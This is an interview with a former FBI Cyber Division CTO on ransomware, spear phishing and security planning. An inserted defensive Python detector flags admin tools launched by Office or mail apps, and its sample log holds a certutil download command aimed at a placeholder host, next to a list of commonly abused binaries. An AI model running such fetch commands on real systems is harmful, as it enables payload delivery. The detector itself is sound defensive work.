Milan Patel has seen a thing or two. He can’t talk about some of it, which makes sense, given that he’s the former CTO of the FBI Cyber Division. While there, he organized and co-led the Joint Requirements Team, facilitated by the White House National Security Council. Prior to that, he was one of the FBI’s most senior cyber agents and worked on numerous global cyber investigations including Anonymous, Rove Digital, and Silk Road. (Part 1 of this two-part series covers what he learned from those cases, along with the simultaneously harrowing and hilarious tale of his first official FBI vehicle.)
As you have probably gathered, Milan, now the chief client officer at BlueVoyant, knows a lot about cybercrime and cybersecurity. He was kind enough to share some of his knowledge with us, so read on!
Q: So what are some of the biggest threats to businesses?
A: To put it simply, bad guys want to make money and they're going to target organizations to accomplish that, whether they're stealing financial instruments like credit cards and siphoning money out of bank accounts or encrypting data in a ransomware campaign to hold it hostage. They could also be stealing other proprietary data with either political or intelligence value and extorting money as part of the scheme—so they’re not just encrypting data and asking for ransom, they are stealing the data and holding it hostage and then asking for a ransom. What we're seeing is companies are willing to pay a lot of money to get their data back or at least make sure the data is not exposed publicly.
Q: What’s the cause of most breaches?
A: I think the cause is probably two-fold. First, nearly 90% of breaches start with a spear phishing campaign of some kind. This entails getting company employees to click on things they shouldn't or download something they shouldn’t. Whether it’s a nation-state actor with sophisticated means and sophisticated needs or a common criminal looking for money, the initial vector is still the same. Social engineering/spear phishing is the predominant vector to get inside companies. Employee cybersecurity education helps, but unfortunately, the bad guys are getting really smart at crafting spear phishing campaigns well beyond the sort of Nigerian scam letters and “click here” written in broken English with Google Translate. For example, they study the future victims they intend to attack by going to LinkedIn, discovering who the CFO's assistant is, then crafting an email to this person pretending to be the CFO asking for the latest financial reports. The assistant has now unknowingly sent these confidential documents to the criminal.
Second, bad guys are increasingly using legitimate information technology management tools to masquerade as legitimate processes that will usually go undetected because they have been whitelisted. We call this “living off the land.”
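One defensive illustration of the two points above, added here as an example and not part of the interview: because the admin tools themselves are allowlisted, a detection has to key on context rather than on the binary, and the parent process is one such context (a mail client or document viewer launching admin tooling is what a phished employee's click looks like). The log format, tool lists and log lines below are constructed for this example.

```python
import re
from typing import Dict, List

# IT-management binaries that are legitimately present and usually allowlisted,
# so their mere execution is not an alert (assumed set for this example).
ALLOWLISTED_ADMIN_TOOLS = {"powershell.exe", "wmic.exe", "certutil.exe",
                           "bitsadmin.exe", "mshta.exe"}

# User-facing parents that have no routine reason to spawn admin tooling:
# the document handlers and mail client a phished employee would be using.
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}

# Constructed process-creation log format: key=value fields, cmd in quotes.
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<host>\S+) parent=(?P<parent>\S+) '
    r'child=(?P<child>\S+) cmd="(?P<cmd>[^"]*)"$')


def parse_line(line: str) -> Dict[str, str]:
    """Parse one constructed log line into its named fields."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    return m.groupdict()


def is_suspicious(event: Dict[str, str]) -> bool:
    """True when an allowlisted admin tool is spawned by a user-facing app."""
    return (event["child"].lower() in ALLOWLISTED_ADMIN_TOOLS
            and event["parent"].lower() in USER_FACING_PARENTS)


def find_living_off_the_land(log_text: str) -> List[Dict[str, str]]:
    """Return the events worth an analyst's attention, in log order."""
    events = (parse_line(l) for l in log_text.splitlines() if l.strip())
    return [ev for ev in events if is_suspicious(ev)]


# Constructed sample: two benign admin uses and two Office/mail-spawned ones.
SAMPLE_LOG = """\
2024-05-01T09:12:03 ws07 parent=explorer.exe child=powershell.exe cmd="powershell.exe -File inventory.ps1"
2024-05-01T09:14:41 ws07 parent=WINWORD.EXE child=powershell.exe cmd="powershell.exe -File update.ps1"
2024-05-01T09:15:02 ws12 parent=svchost.exe child=wmic.exe cmd="wmic.exe os get caption"
2024-05-01T09:16:30 ws12 parent=OUTLOOK.EXE child=certutil.exe cmd="certutil.exe -urlcache -f http://example.invalid/a.txt a.txt"
"""

if __name__ == "__main__":
    for ev in find_living_off_the_land(SAMPLE_LOG):
        print(f"{ev['ts']} {ev['host']}: {ev['parent']} -> {ev['child']} ({ev['cmd']})")
```

The same admin tool appears in both the benign and the flagged lines; only the parent differs, which is why a tool allowlist alone cannot catch this and a set of expert eyes on the parent/child context, as the interview recommends, is what separates a real alert from a false positive.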
Q: On that note, if your best friend owned a business and asked you for recommendations for security, what would your top recommendation be?
A: I would recommend my friend makes sure the basics are being handled the right way. It starts with knowing what is important to your company – for example, is it proprietary data or customer data, and where is it? Then you need to understand how you can gain visibility into those sensitive places. This way, if something tries to get in you get alerted immediately, which also enables you to mount a quicker response. For example, if something reaches a critical server where your sensitive data resides, make sure that you have the ability to know what happened, in real time, and be able to take the right kind of action. If you're going to suffer an incident, it's better to suffer that incident rather than suffer a breach on top of that incident. Simply put, ensure you have visibility and the ability to understand your data, which enables a faster response.
There are lots of other tools you can layer in to do additional security monitoring, but the basics must be covered—cover the vault and cover the front and back door. There seems to be a trend that you need to buy all these sophisticated tools, but these tools were never designed to work together, and organizations are having a tough time figuring out how to use these tools effectively so they work together to find threats on the network.
After this you need to add training for your employees and a set of expert eyes on your security solution console(s), reviewing data coming in and out of the endpoint and network to make sure that what you're looking at is a real threat, not benign or a false positive.
Q: What should a CISO-type consider when putting together a security plan? Are certain things often overlooked?
A: Having a plan is always important and it lends itself to an adage: if you don't write it down, it didn't happen. What we see is that due to resource constraints, a lot of mid-market customers have a tough time documenting a roadmap to achieve the level of security posture that they budgeted for.
What I tell our customers is you need a really objective plan that accounts for viewing your enterprise as a whole, not just listening to a particular team or employee that has a particular viewpoint. Individual employees are part of the business unit and a particular data set may be extremely important to them. They don't want to see anybody mess with it for fear of slowing down their business. That all has to be taken into account after an objective understanding of your overall environment is completed.
We always recommend having an outside third party come in and evaluate your current status and where you need to be. The way we typically talk about that is, at a minimum, let's see where the gap is between total NIST or CIS Top 20 alignment and where you are today. Let’s see the gap analysis from these framework(s) and best practices that help you put down markers in terms of the right controls for your enterprise. They ultimately tie back to strategy and budgeting.
The second thing I would recommend is a really good response plan—one that is not just written to check a box but carefully documented to ensure it reflects the real world and is achievable. We read a lot of response plans and many just say, we're going to do XYZ. What you really need to do is peel back the onion to say “If we have a day-to-day commodity malware attack, these are the things we're going to do. These are the levels of authority we want in place. If we have a ransomware attack, this is what we're going to do. If somebody held data hostage outside the network and wants $1 million to get it back, we're going to do this.” I think those things are truly relevant. Particularly if you're working with a managed security service that has the ability to help you protect your network, then your response plan may change. If you have those two documents and those two policies written, you put yourself in a really defensible position.